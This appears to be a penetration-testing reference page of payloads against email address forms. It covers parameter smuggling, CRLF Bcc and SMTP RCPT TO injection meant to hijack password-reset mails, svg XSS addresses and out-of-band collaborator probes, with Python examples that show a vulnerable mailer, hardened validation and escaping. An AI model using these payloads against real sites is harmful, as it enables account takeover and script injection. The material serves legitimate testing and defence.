# Email Address Forms

## Email Address Form Payloads

The following payloads can be used when attempting to exploit an email address form (registration, password reset, newsletter sign-up, invite and similar).

### **Param Manipulation and CRLF Injection**

Use these payloads to try to make the application send a legitimate password-reset (or similar) email to an address you control, either by confusing how the recipient parameter is parsed (a second address smuggled in through a separator, an encoded `&`, or a JSON list) or by injecting a line break that starts a new `Bcc:` header. Try both the raw and the URL-encoded line-break variants, since different layers decode them differently:

* `email=user@lol.com&test@test.com`
* `email=user@lol.com%26test@test.com`
* `email=user@lol.com;test@test.com`
* `email=user@lol.com, test@test.com`
* `{"email":"user@lol.com","test@test.com"}`
* `{"email":["user@lol.com","test@test.com"]}`
* `email=user@lol.com%0D%0ABcc:test@test.com`
* `email=user@lol.com%0ABcc:test@test.com`
* `email=user@lol.com%0DBcc:test@test.com`
* `email=user@lol.com\r\nBcc:test@test.com`
* `email=user@lol.com\nBcc:test@test.com`
* `email=user@lol.com\rBcc:test@test.com`
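To see what these payloads actually do on the server side, here is an added example (not code from the original page): it decodes the parameter-manipulation payloads the way a typical form parser does, shows a naive password-reset mailer turning the CRLF payloads into a real `Bcc:` header, and puts a hardened mailer next to it. `example.com`, `noreply@example.com` and the token value are made-up stand-ins.

```python
# Added example, not from the original page. Demonstrates the parameter
# manipulation and CRLF injection payloads against a toy reset mailer.
# example.com / noreply@example.com / the token are made-up values.
import re
import urllib.parse
from email import message_from_string
from email.message import EmailMessage


def decode_form(body):
    """Decode a form body the way most frameworks do (parse_qs): every key maps
    to a list, so a stray '&' starts a new key, an encoded '%26' stays inside
    the value, and a repeated key yields two values. Which element the handler
    picks (first, last, joined) decides where the mail ends up."""
    return urllib.parse.parse_qs(body, keep_blank_values=True)


def build_reset_mail_vulnerable(to_address, token):
    """Vulnerable pattern: the submitted address is pasted into the raw header
    block, so a CR, LF or CRLF inside it starts a new header line."""
    return (
        "From: noreply@example.com\r\n"
        f"To: {to_address}\r\n"
        "Subject: Password reset\r\n"
        "\r\n"
        f"https://example.com/reset?token={token}\r\n"
    )


def recipients_seen_by_mta(raw_message):
    """Parse the assembled text as a mail library or MTA would and return every
    recipient header it finds; an injected Bcc shows up as a real header."""
    msg = message_from_string(raw_message)
    return {h: msg.get_all(h) for h in ("To", "Cc", "Bcc") if msg.get_all(h)}


def build_reset_mail_hardened(to_address, token):
    """Hardened: refuse any line break in the address (covers the CRLF, LF and
    CR variants alike) and let the email library build the headers instead of
    concatenating strings. EmailMessage also refuses multi-line header values,
    which gives a second line of defence if the check above is ever bypassed."""
    if re.search(r"[\r\n]", to_address):
        raise ValueError("line break in recipient address")
    msg = EmailMessage()
    msg["From"] = "noreply@example.com"
    msg["To"] = to_address
    msg["Subject"] = "Password reset"
    msg.set_content(f"https://example.com/reset?token={token}\n")
    return msg


if __name__ == "__main__":
    for body in ("email=user@lol.com&test@test.com",
                 "email=user@lol.com%26test@test.com",
                 "email=user@lol.com%0D%0ABcc:test@test.com"):
        print(body, "->", decode_form(body))
    injected = "user@lol.com\r\nBcc:test@test.com"
    print(recipients_seen_by_mta(build_reset_mail_vulnerable(injected, "t0k3n")))
    try:
        build_reset_mail_hardened(injected, "t0k3n")
    except ValueError as err:
        print("hardened mailer rejected it:", err)
```

Which list element a handler uses is framework-specific, so the same payload may go to the attacker on one stack and fail on another; that is why the list carries several separators. Python's `parse_qs` before the fix for CVE-2021-23336 also split on `;`, which is what the `;` payload relies on.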

### **Other checks (XSS, SSRF, SMTP Manipulation)**

Use these payloads to look for other issues. They lean on address syntax that RFC 5322 permits (quoted local parts, comments, bracketed domain literals), so a validator that follows the RFC rather than a conservative allow-list will accept most of them. The `svg` payloads test whether the address is reflected unescaped into a page or into the outgoing mail; the `RCPT TO:` payload tests whether the address is written straight into the SMTP dialogue; the `burpcollab.com` payloads (substitute your own Burp Collaborator or other out-of-band domain) reveal whether the server resolves or connects to the domain part.

* `<svg/onload=alert('XSS')>@test.com`
* `test@test(<svg/onload=alert('XSS')>).com`
* `"<svg/onload=alert('XSS')>"@test.com`
* `"test@gmail.com\r\nRCPT TO:<victim+"@test.com>`
* `test@burpcollab.com`
* `test@[burpcollab.com]`
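As an added example (not code from the original page), the script below runs the addresses above through a constructed permissive "looks like an email" regex and through a strict allow-list, extracts the host an MX or "does this domain exist" check would resolve (the out-of-band hook the `burpcollab.com` payloads probe), and escapes an address before reflecting it into HTML. The `PERMISSIVE` pattern is a stand-in for a typical lax validator, not any particular product's check.

```python
# Added example, not from the original page. Shows which of the section's
# payloads a lax validator lets through, what a strict allow-list rejects,
# which host a server-side domain lookup would hit, and output escaping.
# PERMISSIVE is a constructed stand-in for a typical "has an @ and a dot" check.
import html
import re

PERMISSIVE = re.compile(r"^.+@.+\..+$", re.S)

# Strict allow-list of the plain addr-spec shape real users type. It deliberately
# rejects RFC 5322 quoted strings, comments and domain literals, which is where
# the XSS and SMTP payloads hide.
STRICT = re.compile(r"^[A-Za-z0-9._%+-]+@(?:[A-Za-z0-9-]+\.)+[A-Za-z]{2,}$")

PAYLOADS = [
    "<svg/onload=alert('XSS')>@test.com",
    "test@test(<svg/onload=alert('XSS')>).com",
    "\"<svg/onload=alert('XSS')>\"@test.com",
    "\"test@gmail.com\r\nRCPT TO:<victim+\"@test.com>",
    "test@burpcollab.com",
    "test@[burpcollab.com]",
]


def permissive_ok(addr):
    return bool(PERMISSIVE.match(addr))


def strict_ok(addr):
    return bool(STRICT.match(addr))


def lookup_target(addr):
    """Host a server-side 'is this domain real?' check would resolve: everything
    after the last '@', with a domain literal's brackets stripped. If the app
    performs that lookup, a collaborator domain here produces an OOB hit."""
    domain = addr.rsplit("@", 1)[1]
    if domain.startswith("[") and domain.endswith("]"):
        return domain[1:-1]
    return domain


def reflect_safely(addr):
    """Escape before echoing an address into HTML ('we sent a mail to ...'),
    so the svg payloads render as text instead of executing."""
    return html.escape(addr, quote=True)


if __name__ == "__main__":
    for p in PAYLOADS:
        print(f"{p!r}: permissive={permissive_ok(p)} strict={strict_ok(p)} "
              f"lookup={lookup_target(p)!r}")
    print(reflect_safely(PAYLOADS[0]))
```

Note that the plain `test@burpcollab.com` passes even the strict pattern: the out-of-band interaction comes from the server choosing to resolve or connect to the domain, not from malformed syntax, so this check is about server behaviour rather than input validation.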
